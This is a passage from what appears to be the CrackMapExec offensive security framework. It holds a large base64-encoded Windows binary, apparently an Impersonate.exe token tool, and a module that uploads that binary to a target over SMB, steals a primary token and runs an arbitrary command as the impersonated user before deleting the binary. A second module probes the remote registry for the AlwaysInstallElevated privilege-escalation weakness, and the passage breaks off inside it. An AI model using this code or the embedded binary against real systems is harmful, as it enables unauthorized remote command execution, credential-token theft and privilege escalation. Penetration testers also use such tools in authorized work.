AAA//////////8AAAAAAAAAAIAACgoKAAAAAAAAAAAAAABCagFAAQAAAP////8AAAAAAAAAAAAAAABAZQFAAQAAAAEAAAAAAAAAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo8wFAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACjzAUABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKPMBQAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo8wFAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACjzAUABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHD4AUABAAAAAAAAAAAAAAAAAAAAAAAAAMBnAUABAAAAQGkBQAEAAABQbAFAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDxAUABAAAAMPMBQAEAAABDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5egAAAAAAAEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAgICAgICAgICAgICAgICAgICAgICAgICAgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6AAAAAAAAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQIECAAAAAAAAAAAAAAAAKQDAABggnmCIQAAAAAAAACm3wAAAAAAAKGlAAAAAAAAgZ/g/AAAAABAfoD8AAAAAKgDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABA/gAAAAAAALUDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABB/gAAAAAAALYDAADPouSiGgDlouiiWwAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABAfqH+AAAAAFEFAABR2l7aIABf2mraMgAAAAAAAAAAAAAAAAAAAAAAgdPY3uD5AAAxfoH+AAAAAAj5AUABAAAAqAwCQAEAAACoDAJAAQAAAKgMAkABAAAAqAwCQAEAAACoDAJAAQAAAKgMAkABAAAAqAwCQAEAAACoDAJAAQAAAKgMAkABAAAAf39/f39/f38M+QFAAQAAAKwMAkABAAAArAwCQAEAAACsDAJAAQAAAKwMAkABAAAArAwCQAEAAACsDAJAAQAAAKwMAkABAAAALgAAAC4AAAD+////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQECAgICAgICAgICAgICAgICAwMDAwMDAwMAAAAAAAAAAP7/////////AQAAAAAAAAABAAAAdZgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQAABjEAAAuNQBAHAQAAAfHAAAxNQBACAcAACCHAAA7NQBAJAcAADyHAAA7NQBABAdAAAuHQAAANUBADAdAADmHQAABNUBAOgdAAD4HQAADNUBAPgdAAARHgAADNUBABQeAACQHwAAFNUBAJAfAACiHwAADNUBAKQfAADYHwAABNUBANgfAACqIAAAVNUBAKwgAAAdIQAAXNUBACAhAABZIQAADNUBAFwhAAClIQAABNUBAKghAAAzIgAABNUBADQiAADMIgAAaNUBAMwiAADwIgAABNUBAPAiAAAZIwAABNUBABwjAABWIwAABNUBAFgjAABvIwAADNUBAHAjAAAcJAAAkNUBAFAkAABrJAAADNUBAJAkAADbJQAAnNUBAOQlAAA1JgAADNUBAEgmAACjJgAArNUBAKQmAADgJgAArNUBAOAmAAAcJwAArNUBABwnAADIKAAAuNUBAOAoAADXKgAA1NUBANgqAAAAKwAADNUBAAArAAAZKwAADNUBABwrAACJKwAA8NUBAJArAACiKwAADNUBAKQrAAC2KwAADNUBANArAADgKwAAINYBAPArAAB4LwAALNYBAJAvAACoLwAAMNYBALAvAACxLwAANNYBAMAvAADBLwAAONYBAPwvAAAbMAAADNUBABwwAAA1MAAADNUBADgwAAD3MAAAPNYBAPgwAAA/MQAADNUBAEAxAABiMQAADNUBAGQxAACqMQAABNUBAKwxAADjMQAABNUBAOQxAAAyMwAATNYBADQzAAB5MwAABNUBAHwzAADCMwAABNUBAMQzAAAKNAAABNUBAAw0AABdNAAArNUBAGA0AADBNAAAPNYBAOA0AADwNAAAaNYBAAA1AAB1OwAAdNYBAJA7AADQOwAAeNYBAOA7AAAKPAAAgNYBABA8AAA2PAAAiNYBAEA8AACHPAAAkNYBAJA8AACvPQAAmNYBAMQ9AAAfPgAABNUBADg+AAA6QQAAzNYBADxBAADhRwAA6NYBAORHAAB/SAAAPNYBAIBIAAD2SAAAsNYBAPhIAAAhSQAAxNYBACxJAACRSQAABNUBAJRJAADRSQAALNgBANRJAACmSwAA4NcBAKhLAABOTAAAsNYBAFBMAAD5TAAAsNYBADxNAADDTQAAJNgBAMRNAABnTgAAJNgBAGhOAAD1TgAAJNgBAPhOAACcTwAAJNgBAJxPAAAnUAAADNgBAChQAACeUAAAANgBAKBQAADNUQAAqNcBAOhSAACJUwAAUNcBAIxTAAAvVAAAUNgBADBUAABDVgAAQNcBAERWAAC7WAAAmNYBALxYAAAsWQAABNUBACxZAADOWQAABNUBANBZAAA9WwAADNUBAEBbAADTXAAADNUBANRcAABYXwAAZNcBAFhfAAAiYgAAZNgBAAxjAACFYwAAPNYBAIhjAABDZQAAhNcBAERlAAAjZwAAmNgBACRnAADpZwAAfNcBAOxnAACSaAAAiNgBAJRoAAATagAAmNYBABRqAACZawAAmNYBAJxrAAAibAAArNUBACRsAAC6bAAABNUBALxsAACDbQAAPNYBAIRtAAAebgAADNUBACBuAABBbwAAkNcBAERvAAAqcAAAqNgBACxwAADRcAAAyNcBANRwAADJcQAAJNcBAMxxAABXcgAAHNcBAFhyAACxcwAAANcBANBzAABSdQAAsNYBAOR1AACEdwAA0NgBAIR3AADhdwAABNUBAOR3AABmeQAAvNgBAGh5AADPeQAArNUBANB5AADjegAA9NgBAOR6AAAlewAA6NgBACh7AADZewAADNkBANx7AAD2ewAADNUBAPh7AAASfAAADNUBABR8AABPfAAADNUBAFB8AACIfAAADNUBAIh8AADWfAAADNUBAOB8AABEfQAAsNYBAER9AACBfQAArNUBAIR9AAC8fQAASNkBALx9AAB9fgAAKNkBAIx+AABIfwAAHNkBAEh/AACSfwAABNUBAJR/AADvfwAABNUBACSAAABggAAADNUBAGyAAACpgAAADNUBAKyAAADRgAAADNUBAOSAAABSgQAAdNkBAGCBAACOgQAAbNkBAJCBAAD5gQAABNUBAASCAAAvggAADNUBADiCAABzggAA3NkBAHSCAACvggAAANoBALCCAABghAAArNkBAGCEAAB2hQAAxNkBAIiFAADChQAApNkBAOyFAAA0hgAAnNkBAEiGAABrhgAADNUBAGyGAAB8hgAADNUBAHyGAAC5hgAABNUBAMSGAAAEhwAABNUBAASHAABfhwAADNUBAHSHAACphwAADNUBAKyHAADMhwAAJNoBAMyHAAAriAAABNUBACyIAACCiAAADNUBAKCIAAAdiQAASNoBAEyJAADBiQAABNUBAMSJAAAfiwAATNoBACiLAADWiwAAbNoBANiLAAD2iwAAxNYBAPiLAAA/jAAADNUBAIiMAADWjAAArNUBANiMAAD4jAAADNUBAPiMAAAYjQAADNUBABiNAABVjQAAgNoBAFiNAAAujwAATNYBADCPAAB+jwAABNUBAICPAABckAAAkNoBAFyQAACkkAAABNUBAKSQAADqkAAABNUBAOyQAAAykQAABNUBADSRAACFkQAArNUBAIiRAADpkQAAPNYBAOyRAADIkgAAkNoBAMiSAAAYkwAArNUBABiTAABJkwAAiNoBAEyTAACNkwAABNUBAJCTAABBlAAApNoBAESUAADelAAA0NoBAOCUAADAlQAA9NoBAMCVAAAdlgAAyNoBACCWAACalgAAPNYBAJyWAADnlgAABNUBAPCWAAAwlwAABNUBADCXAAAdmAAAPNsBACCYAAAsmQAAmNYBACyZAABnmQAAHNsBAGiZAAComQAArNUBAKiZAADXmQAADNUBANiZAABEmgAAWNsBAESaAABMmwAAZNsBAEybAACLmwAAkNsBAIybAADJmwAA/NsBAMybAAARnAAAtNsBABScAABznAAA2NsBAHScAABBnQAAgNsBAESdAABknQAAgNoBAGSdAABZngAAiNsBAFyeAADDngAArNUBAMSeAACYnwAAPNYBAJifAAA/oAAABNUBAECgAAAMoQAAPNYBAAyhAABFoQAADNUBAEihAABqoQAADNUBAGyhAACdoQAABNUBAKChAADRoQAABNUBANShAABOogAArNUBAFCiAACuogAABNUBALCiAADaogAAxNYBANyiAAAGowAAxNYBAAijAACGpAAAkNoBAJCkAAAspgAAINwBAFSpAADUrAAAYNwBANSsAADErQAAkNoBAMStAACWrwAASNwBAJivAAD9sAAAfNwBAACxAABFsgAAlNwBAEiyAABeswAAJNcBAGCzAACXtgAAMNwBAJi2AAC+tgAADNUBAPC2AAA2twAABNUBADi3AAAAuAAArNUBAAC4AAA5uAAAqNwBADy4AAAguQAArNUBADS5AAD+vAAAsNwBAAC9AACJvgAA1NwBAJS+AABOwAAAbN0BAFDAAADNwAAAEN0BANDAAABgwQAAsNYBAGDBAABBwwAAUN0BAETDAAACxQAAQN0BAATFAAC8xQAAGN0BALzFAAAcxgAADNUBABzGAAA4xgAADNUBADjGAADxyAAA8NwBAFDJAAD9yQAAkN0BAADKAACfygAAsNYBAKDKAADCzQAA1NwBAMTNAACzzgAAnN0BALzOAAAEzwAABNUBACDPAABXzwAABNUBAHTPAACwzwAABNUBALDPAABV0AAAsNYBAFjQAACo0AAAyN0BAKjQAABQ0QAA2N0BAKDRAABa0gAAtN0BAFzSAADR0gAADNUBAPDSAAD60wAABN4BAPzTAABo1AAAgNoBAGjUAADA1AAAPNYBAMDUAADI1QAADN4BAPzVAACJ1wAAHN4BABjYAACO2QAAsNYBALjZAADu2QAAgNoBABjaAADA2gAADNUBAMDaAAAu2wAARN4BADDbAACV2wAArNUBAJjbAAAt3AAAsNYBADDcAABM3AAADNUBAFjcAADY3AAAPNYBANjcAAAU3QAArNUBABzdAABL3QAABNUBAEzdAACA3QAAaN4BAIDdAADF3QAAxN4BAMjdAAD23QAAbNkBABjeAACC4AAAiN4BAITgAAAz4QAAxNkBADThAAC34QAArNUBALjhAAAa4gAA6N4BABziAACo4gAAFN8BAKjiAAA54wAADN8BADzjAAAo6AAAgN8BACjoAAAq6QAApN8BACzpAABF6gAApN8BAEjqAAC46wAAxN8BALjrAACj7AAAON8BAKTsAACH7wAAaN8BAJDvAADb7wAAEN0BANzvAAAV8AAAfNcBABjwAACO8QAA6N8BAJDxAABD8gAADNUBAETyAACf8wAAxNkBAKDzAADM9QAAIOABAMz1AACA9wAAOOABAID3AADJ9wAATOABAMz3AAAQCgEAAOABABAKAQCXCgEAPNYBAJgKAQCsCgEADNUBAKwKAQCQCwEAXOABAJALAQAJDAEABNUBAAwMAQDDDAEArNUBAMQMAQAjDQEADNUBADANAQCLDQEAbOABAIsNAQCvEAEAhOABAK8QAQDNEAEAqOABANAQAQDlEwEAyOABAOgTAQB+FAEAuOABAIAUAQCXFAEADNUBAJgUAQDnFAEADNUBAOgUAQDYFQEAkNoBACQWAQBdFgEADNUBAGAWAQDRFgEA8OABANQWAQB1FwEADN8BAHgXAQA1GAEArNUBAFQYAQBDGQEAFOEBAEQZAQDdGQEAPNYBAPAZAQArGgEAROEBACwaAQABHAEATOEBAAQcAQBnHAEABNUBAGgcAQCIH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oimmKaoprimyKbYpuim+KYIpxinKKc4p0inWKdop3iniKeYp6inuKfIp9in6Kf4pwioGKgoqDioSKhYqGioeKiIqJioqKi4qMio2KjoqPioCKkYqSipOKlIqVipaKl4qYipmKmoqbipyKnYqeip+KkIqhiqKKo4qkiqWKpoqniqiKqYqqiquKrIqtiq6Kr4qgirGKsoqzirSKtYq2ireKuIq5irqKu4q8ir2Kvoq/irCKwYrCisOKxIrFisaKx4rIismKyorLisyKzYrOis+KwIrRitKK04rUitWK1orXitiK2YraituK3Irdit6K34rQiuGK4orjiuSK5YrmiueK6IrpiuqK64rsiu2K7orviuCK8YryivOK9Ir1ivaK94r4ivmK+or7ivyK/Yr+iv+K8AAACAAQCEAAAACKAYoCigOKBIoFigaKB4oIigmKCooLigyKDYoOig+KAIoRihKKE4oUihWKFooXihiKGYoaihuKHIodih6KH4oQiiGKIoojiiSKJwroCukK6grrCuwK7QruCu8K4ArxCvIK8wr0CvUK9gr3CvgK+Qr6CvsK/Ar9Cv4K/wrwCQAQCgAQAAAKAQoCCgMKBAoFCgYKBwoICgkKCgoLCgwKDQoOCg8KAAoRChIKEwoUChUKFgoXChgKGQoaChsKHAodCh4KHwoQCiEKIgojCiQKJQomCicKKAopCioKKwosCi0KLgovCiAKMQoyCjMKNAo1CjYKNwo4CjkKOgo7CjwKPQo+Cj8KMApBCkIKQwpECkUKRgpHCkgKSQpKCksKTApNCk4KTwpAClEKUgpTClQKVQpWClcKWApZCloKWwpcCl0KXgpfClAKYQpiCmMKZAplCmYKZwpoCmkKagprCmwKbQpuCm8KYApxCnIKcwp0CnUKdgp3CngKeQp6CnsKfAp9Cn4KfwpwCoEKggqDCoQKhQqGCocKiAqJCooKiwqMCo0KjgqPCoAKkQqSCpMKlAqVCpYKlwqYCpkKmgqbCpwKnQqeCp8KkAqhCqIKowqkCqUKpgqnCqgKqQqqCqsKrAqtCq4KrwqgCrEKsgqzCrQKtQq2CrcKuAq5CroKuwq8Cr0Kvgq/CrAKwQrCCsMKxArFCsYKxwrICskKygrAAAAMABABwAAAAYrzCvOK/Ar9iv4K/or/Cv+K8AAADwAQBIAAAAqKHAoQiiKKJIomiiiKK4otCi2KLgohijIKNwqHiogKiIqJComKigqKiosKi4qMio0KjYqOCo6KjwqPioAKkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==")
if "EXEC" in module_options:
self.cmd = module_options["EXEC"]
if "TOKEN" in module_options:
self.token = module_options["TOKEN"]
if "IMP_EXE" in module_options:
self.imp_exe = module_options["IMP_EXE"]
self.useembeded = False
def list_available_primary_tokens(self, _, connection):
command = f"{self.tmp_dir}Impersonate.exe list"
return connection.execute(command, True)
def on_admin_login(self, context, connection):
if self.useembeded:
file_to_upload = "/tmp/Impersonate.exe"
with open(file_to_upload, 'wb') as impersonate:
impersonate.write(self.impersonate_embedded)
else:
if path.isfile(self.imp_exe):
file_to_upload = self.imp_exe
else:
context.log.error(f"Cannot open {self.imp_exe}")
exit(1)
context.log.display(f"Uploading {self.impersonate}")
with open(file_to_upload, 'rb') as impersonate:
try:
connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)
context.log.success(f"Impersonate binary successfully uploaded")
except Exception as e:
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
return
try:
if self.cmd == "" or self.token == "":
context.log.display(f"Listing available primary tokens")
p = self.list_available_primary_tokens(context, connection)
for line in p.splitlines():
token, token_integrity, token_owner = line.split(" ", 2)
context.log.highlight(f"Primary token ID: {token:<2} {token_integrity:<6} {token_owner}")
else:
impersonated_user = ""
p = self.list_available_primary_tokens(context, connection)
for line in p.splitlines():
token_id, token_integrity, token_owner = line.split(" ", 2)
if token_id == self.token:
impersonated_user = token_owner.strip()
break
if impersonated_user:
context.log.display(f"Executing {self.cmd} as {impersonated_user}")
command = f'{self.tmp_dir}Impersonate.exe exec {self.token} \"{self.cmd}\"'
for line in connection.execute(command, True, methods=["smbexec"]).splitlines():
context.log.highlight(line)
else:
context.log.fail(f"Invalid token ID submitted")
except Exception as e:
context.log.fail(f"Error runing command: {e}")
finally:
try:
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")
context.log.success(f"Impersonate binary successfully deleted")
except Exception as e:
context.log.fail(f"Error deleting Impersonate.exe on {self.share}: {e}")
================================================
FILE: cme/modules/install_elevated.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.dcerpc.v5 import rrp
from impacket.dcerpc.v5 import scmr
from impacket.examples.secretsdump import RemoteOperations
class CMEModule:
name = "install_elevated"
description = "Checks for AlwaysInstallElevated"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
""" """
def on_admin_login(self, context, connection):
try:
remote_ops = RemoteOperations(connection.conn, False)
remote_ops.enableRegistry()
try:
ans_machine = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
reg_handle = ans_machine["phKey"]
ans_machine = rrp.hBaseRegOpenKey(
remote_ops._RemoteOperations__rrp,
reg_handle,
"SOFTWARE\\Policies\\Microsoft\\Windows\\Installer",
)
key_handle = ans_machine["phkResult"]
data_type, aie_machine_value = rrp.hBaseRegQueryValue(
remote_ops._RemoteOperations__rrp,
key_handle,
"AlwaysInstallElevated",
)
rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
if aie_machine_value == 0:
context.log.highlight("AlwaysInstallElevated Status: 0 (Disabled)")
return
except rrp.DCERPCSessionError:
context.log.highlight("AlwaysInstallElevated Status: 0 (Disabled)")
return
try:
ans_user = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)
reg_handle = ans_user["phKey"]
ans_user = rrp.hBaseRegOpenKey(
remote_ops._RemoteOperations__rrp,
reg_handle,
"SOFTWARE\\Policies\\Microsoft\\Windows\\Installer",
)
key_handle = ans_user["phkResult"]
data_type, aie_user_value = rrp.hBaseRegQueryValue(
remote_ops._RemoteOperations__rrp,
key_handle,
"AlwaysInstallElevated",
)
rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
except rrp.DCERPCSessionError:
context.log.highlight("AlwaysInstallElevated Status: 1 (Enabled: Computer Only)")
return
if aie_user_value == 0:
context.log.highlight("AlwaysInstallElevated Status: 1 (Enabled: Computer Only)")
else:
context.log.highlight("AlwaysInstallElevated Status: 1 (Enabled)")
finally:
try:
remote_ops.finish()
except scmr.DCERPCSessionError as e:
context.log.debug(f"Received SessionError while attempting to clean up logins: {e}")
except Exception as e:
